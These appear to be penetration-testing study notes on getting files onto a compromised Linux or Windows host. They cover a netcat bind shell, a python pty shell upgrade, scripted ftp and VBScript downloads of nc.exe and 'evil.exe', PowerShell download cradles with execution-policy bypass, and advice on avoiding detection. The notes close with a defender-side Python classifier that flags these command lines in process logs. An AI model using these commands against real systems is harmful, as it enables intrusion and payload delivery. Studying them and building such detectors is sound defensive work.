Transferring Modules
Dangers of transferring attack tools:
Uploaded tools are more likely to be detected, so where possible we should use the tools already present on the victim's machine (its native tools) instead of transferring our own.
Installing Pure-FTPd
```bash
sudo apt update && sudo apt -y install pure-ftpd
```
```bash
#!/bin/bash
# Dedicated group and locked-down system account for Pure-FTPd: no real home
# directory and a non-executable "shell" (/etc), so it cannot log in interactively.
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
# Virtual FTP user "offsec", mapped to the ftpuser system account, with /ftphome
# as its FTP root (pure-pw prompts for the password), then build the PureDB.
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
# Enable the PureDB authentication backend.
cd /etc/pure-ftpd/auth/ || exit 1
ln -s ../conf/PureDB 60pdb
# Create the FTP root, hand it to the FTP account and restart the service.
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
systemctl restart pure-ftpd
```
Non-interactive shell:
```bash
nc -lvnp 4444 -e /bin/bash   # listener that hands the connection a shell
nc -vn 10.10.0.128 4444      # connect to the listener
```
----
netcat provides only a non-interactive shell.
Logging in to the FTP account from it appears to do nothing: the ftp client is interacting in the background, because STDOUT is not correctly redirected in the basic bind or reverse shell.
You have to exit out of the ftp session.
---
Upgrading a non-interactive shell.
The python interpreter comes with the pty module; we can use it to spawn a fully interactive shell:
```bash
nc -vn 10.10.10.111 4444
python -c 'import pty; pty.spawn("/bin/bash")'
ftp 10.10.11.4
```
Now we can interact!
Transferring Files with a Windows host
Non-interactive FTP download
Assuming we already have a shell on the Windows machine:
1. ftp --help
   -s:filename specifies a text file containing FTP commands -> we can use this.
   The idea is to create a text file with the FTP commands in it.
2. In the /ftphome/ directory on kali, place a netcat binary (nc.exe).
3. Start the FTP server on kali:
   sudo systemctl restart pure-ftpd
4. Create the text file with echo commands (one FTP command per line):
- echo open 10.11.0.4 21 >> ftp.txt
- echo USER offsec >> ftp.txt (the username)
- echo lab >> ftp.txt (the password)
- echo bin >> ftp.txt (binary transfer mode)
- echo GET nc.exe >> ftp.txt
- echo bye >> ftp.txt
5. ftp -v -n -s:ftp.txt
   -v suppresses the display of the server's responses
   -n suppresses automatic login on the initial connection
VBScript
Copy the Windows version of wget (wget.vbs) to our root, then run it on the victim:
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe
This downloads a file from our machine onto the victim's machine.
Easier
Remember, since we only have a non-interactive shell we cannot start PowerShell.exe directly, because our shell can't handle that. But we can get around it by creating a PowerShell script and then executing the script:
Now we invoke it with this crazy syntax:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
-ExecutionPolicy Bypass -NoLogo -NonInteractive --- stealthy (no policy prompt, no banner, no prompts for input)
One-liner alternative. DownloadFile takes two arguments, the URL and a local destination path; the original note omitted the second, so a destination of gori.ps1 is assumed here:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.119.146/gori.ps1','gori.ps1')"
Transferring files through PowerShell
1. On the kali machine, copy whatever you want to send to the web root (/var/www/html/) and start the apache server.
2. Useful scripts are in /usr/share/nishang.
3. On the Windows machine type the following command:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.10.128/unko.txt','C:\Users\Administrator\Desktop\transferme.txt')"
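As an added defender-side example (not part of the original notes), here is a small Python classifier that flags the command lines from the ftp -s: procedure, the VBScript downloader, the PowerShell invocations and the pty shell upgrade above when they turn up in process-creation logs. The rule names, the event fields and the sample events are constructed for this illustration; the command lines in the sample are the ones quoted in these notes.

```python
import re
from typing import Dict, List, Tuple

# Detection rules for the techniques described in the notes above: the ftp -s:
# script download, the wget.vbs downloader, the PowerShell WebClient.DownloadFile
# cradle, the quiet "-ExecutionPolicy Bypass -NonInteractive" invocation, and the
# python pty shell upgrade. Matching is case-insensitive because Windows command
# lines are. Rule names are constructed for this example.
RULES: List[Tuple[str, re.Pattern]] = [
    ("ftp_script_download",
     re.compile(r"\bftp(\.exe)?\b.*?-s:", re.I)),
    ("cscript_vbs_with_url",
     re.compile(r"\b[cw]script(\.exe)?\b.*?\.vbs\b.*?https?://", re.I)),
    ("powershell_webclient_downloadfile",
     re.compile(r"\bpowershell(\.exe)?\b.*?(net\.webclient|downloadfile)", re.I)),
    ("powershell_bypass_noninteractive",
     re.compile(r"\bpowershell(\.exe)?\b(?=.*-executionpolicy\s+bypass)(?=.*-noninteractive)", re.I)),
    ("python_pty_spawn",
     re.compile(r"\bpython\d?(\.\d+)?\b.*?import\s+pty.*?pty\.spawn", re.I)),
]

# Constructed sample of process-creation events: the fields you would take from
# Sysmon Event ID 1 or Security event 4688 on Windows, or from an execve audit
# record on Linux. Hostnames and user names are made up for the example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": "ftp -v -n -s:ftp.txt"},
    {"host": "WS01", "user": "CORP\\jdoe",
     "cmdline": "cscript wget.vbs http://192.168.10.5/evil.exe evil.exe"},
    {"host": "WS02", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1"},
    {"host": "WS02", "user": "CORP\\Administrator",
     "cmdline": "powershell -c \"(new-object System.Net.WebClient).DownloadFile('http://192.168.10.128/unko.txt','C:\\Users\\Administrator\\Desktop\\transferme.txt')\""},
    {"host": "SRV01", "user": "www-data",
     "cmdline": "python -c 'import pty; pty.spawn(\"/bin/bash\")'"},
    # Two benign command lines that must not fire.
    {"host": "WS03", "user": "CORP\\ops",
     "cmdline": "powershell -NoProfile -Command Get-Service"},
    {"host": "WS03", "user": "CORP\\ops",
     "cmdline": "ftp ftp.example.internal"},
]


def classify(cmdline: str) -> List[str]:
    """Return the names of every rule the command line matches, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (host, user, rule) findings for every event that matches a rule."""
    findings = []
    for ev in events:
        for rule in classify(ev["cmdline"]):
            findings.append((ev["host"], ev["user"], rule))
    return findings


if __name__ == "__main__":
    for host, user, rule in scan(SAMPLE_EVENTS):
        print(f"{host:6} {user:24} {rule}")
```

Feed it the command-line field of Sysmon Event ID 1 or Security event 4688 (4688 only carries the command line when "Include command line in process creation events" is enabled). DownloadFile and -ExecutionPolicy Bypass are also used by legitimate administration scripts, so treat the two PowerShell rules as hunting leads to baseline against known scripts rather than hard alerts; the ftp -s: and cscript-with-URL rules are rare in normal use and deserve a closer look whenever they fire.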